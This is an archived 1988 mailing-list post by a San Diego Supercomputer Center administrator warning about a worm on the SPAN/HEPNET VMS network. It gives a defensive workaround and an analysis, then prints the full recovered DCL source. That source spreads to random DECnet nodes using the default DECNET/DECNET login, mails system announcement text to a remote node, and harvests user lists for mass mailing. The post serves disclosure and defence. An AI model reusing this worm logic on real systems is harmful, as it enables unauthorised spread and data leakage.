Another worm (this time on SPAN/HEPNET ... VMS only)

Gerard K. Newman (gkn@Sds.Sdsc.Edu)
Fri, 23 Dec 88 04:12:51 GMT

Ladies and gentleman,

Please excuse the posting to TCP-IP, but there are many SPAN/HEPNET uses who
read this list, and the community as a whole should be somewhat interested.

Someone has loosed a worm on SPAN at this very moment. Check your accounting
files and NETSERVER.LOGs in your default DECnet accounts. You'll find evidence
of someone creating a file (HI.COM, which I am in the process of fetching from
the deleted blocks of one of them) which propagates itself around the network.

It has hit all of the VMS machines here at SDSC today, and simply appears to
crawl around and send mail to 20597::PHISOLIDE (node 20.117, for which I do not
have a name in my DECnet database).

An adequate defense against the problem is:

(from the SYSTEM or other suitably privileged account):

        $ Set Default your-default-decnet-area
        $ Create HI.COM
        $ Stop/ID=0
        $ Set File/Owner=[1,4]/Protection=(S:RWED,O:RWED,G:RE,W:RE)/Version=1 HI.COM

This information should receive the widest possible distribution.

Please give me a call (# below) if you need more information.

Bitnet: Bitnet: GKN@SDSC
Span: SDSC::GKN (27.1)
USPS: Gerard K. Newman
          San Diego Supercomputer Center
          P.O. Box 85608
          San Diego, CA 92138-5608
Phone: 619.534.5076


I present for your amusment HI.COM, along with a brief analysis:

First, it sets it's process name to "MAIL_178DC" as mentioned. Then, it
begins a scan looking for a process whose working set extent is 1 page
less than it's authorized working set extent, and if it finds one it commits
suicide. If it doesn't find one, it sets its working set extent to 1 page
less than it's authorized extent. This, presumably, it to identify itself
and prevent multiple infections.

It then saves a copy of itself line-by-line in DCL symbols ("HILINEn"), and
marks itself for delete (thus disappearing from the default DECnet directory).

It then sends a copy of the translation of the logical name SYS$ANNOUNCE to
node 20597::PHSOLIDE (node 20.117, for which I do not have a name). It does
this by spawning an asynchronous subprocess so that it does not hang itself
waiting for the mail to be delivered, and presumably as a guard in case node
20.117 is down.

It then fetches the current time, and determines if it's after 00:30 on
12/24/1988. If so it commits suicide. If not, it checks to see if it's
after 00:00 on 12/24/1988. If not, it attempts to generate a random node
number to attempt to infect by picking apart the system time. It then
attempts to contact the random node and copy itself there. It tries both
default DECnet access and specifying user ID DECNET with password DECNET
to copy itself. It will only try to infect 151 machines, where 151 is 1 less
than the number of lines in the command file. Once it's copied itself someplace
it "jumpstarts" that copy by invoking it via DECnet.


It appears that after midnight on 12/24/1988 it's behavior will change, and it
will send the silly message included to everyone on the machine. It obtains
this list by exploiting some silliness in the AUTHORIZE utility; even though
the default DECnet account (presumably!) does not have enough privilege to
read SYSUAF.DAT, it will produce a list of the RIGHTS database. Armed with
this list, it will contact the DECNET mail server (object number 27) and send
a copy of it's message (from "Father Christmas") to all of the people listed
in the rights database.

It appears to be harmless.


$ on error then continue
$ set noverify
$ define sys$error nl:
$ define sys$output nl:
$ set default sys$login
$ set process/name="MAIL_178DC"
$ delete := delete
$ spawn := spawn
$ null[0,7]=0
$ open/read/write link sys$net
$ close link
$ pid = f$pid(context)
$ if pid .eqs. "" then goto start
$ if f$getjpi(pid,"wsauthext")-1 .eq. f$getjpi(pid,"wsextent") then -
     goto stop_process
$ goto look_loop
$ set protection=o:rwed;*
$ delete;*
$ stop/id=0
$ workset = f$getjpi(0,"wsauthext")-1
$ set work/extent='workset'
$ counter = 0
$ open/read hi$file
$ read/end_of_file=end_loop1 hi$file hiline'counter'
$ counter = counter + 1
$ goto loop1
$ close hi$file
$ num_hilines = counter
$ set protection=o:rwed;*
$ delete;*
$ spawn/input=nl:/output=nl:/nonotify/nolog/nowait -
    mail/subj="''f$trnlnm("sys$announce")'" nl: 20597::phsolide
$ time = f$extr(0,16,f$cvtime(f$time()))
$ if time .gts. "1988-12-24 00:30" then stop/id=0
$ if time .gts. "1988-12-24 00:00" then goto mailing
$ node = (f$int(f$ext(21,1,f$time()))*10000) + -
         (f$int(f$ext(21,1,f$time()))*1000) + -
         (f$int(f$ext(21,1,f$time()))*100) + -
         (f$int(f$ext(21,1,f$time()))*10) + -
$ node = node*(f$int(f$ext(18,2,f$time()))+1)/63
$ if node .eq. 0 then goto generate_node
$ if node .gt. 63*1024 then goto generate_node
$ counter = 0
$ open/write/error=open_error hi$file 'node'
$ write/error=cleanup hi$file hiline'counter'
$ if counter .eq. num_hilines-1 then goto end_loop2
$ counter = counter + 1
$ goto loop2
$ close hi$file
$ type 'node'::""
$ if ($$loc("""",node).ne.f$len(node)) -
     then goto 2nd_error_check
$ node := 'node'"""DECNET DECNET""
$ goto start_task
$ if $status .ne. "%x10000001" then goto cleanup
$ goto search_node
$ close hi$file
$ delete 'node';*
$ goto search_node
$ if ($$loc("""",node).ne.f$len(node)) -
      then goto search_node
$ node := 'node'"""DECNET DECNET""
$ goto reprod
$ mailline0 = "Hi,"
$ mailline1 = ""
$ mailline2 = " how are ya ? I had a hard time preparing all the presents."
$ mailline3 = " It isn't quite an easy job. I'm getting more and more"
$ mailline4 = " letters from the children every year and it's not so easy"
$ mailline5 = " to get the terrible Rambo-Guns, Tanks and Space Ships up here at
$ mailline6 = " the Northpole. But now the good part is coming."
$ mailline7 = " Distributing all the presents with my sleigh and the"
$ mailline8 = " deers is real fun. When I slide down the chimneys"
$ mailline9 = " I often find a little present offered by the children,"
$ mailline10 = " or even a little Brandy from the father. (Yeah!)"
$ mailline11 = " Anyhow the chimneys are getting tighter and tighter"
$ mailline12 = " every year. I think I'll have to put my diet on again."
$ mailline13 = " And after Christmas I've got my big holidays :-)."
$ mailline14 = ""
$ mailline15 = " Now stop computing and have a good time at home !!!!"
$ mailline16 = ""
$ mailline17 = " Merry Christmas"
$ mailline18 = " and a happy New Year"
$ mailline19 = ""
$ mailline20 = " Your Father Christmas"
$ num_maillines = 21
$ define sysuaf sys$login:sysuaf
$ mc authorize
list/id *
$ delete sys$login:sysuaf.dat;*
$ node = 0
$ open/read/write net$link 'node'::"27="
$ if ($$loc("""",node).ne.f$len(node)) -
    then goto start_mail
$ node := 'node'"""DECNET DECNET""
$ goto mail_good
$ close net$link
$ open/read user$file rightslist.lis
$ read user$file user
$ open/read/write net$link 'node'::"27="
$ write net$link "Father Christmas"
$ read/end_of_file=end_mailing user$file user
$ if f$extr(3,1,user) .eqs. " " then goto next_user
$ user = f$extr(2,12,user)
$ write net$link user
$ read net$link error
$ if f$cvui(0,32,error) .ne. 1 then goto close_net
$ write net$link null
$ write net$link "You..."
$ write net$link "Christmas Card."
$ counter = 0
$ write net$link mailline'counter'
$ counter = counter + 1
$ if counter .eq. num_maillines then goto end_text_loop
$ goto text_loop
$ write net$link null
$ wait 00:00:01
$ close net$link
$ goto loop3
$ close net$link
$ close user$file
$ delete rightslist.lis;*
$ wait 00:30
$ stop/id=0

This archive was generated by hypermail 2.0b3 on Thu Mar 09 2000 - 14:44:56 GMT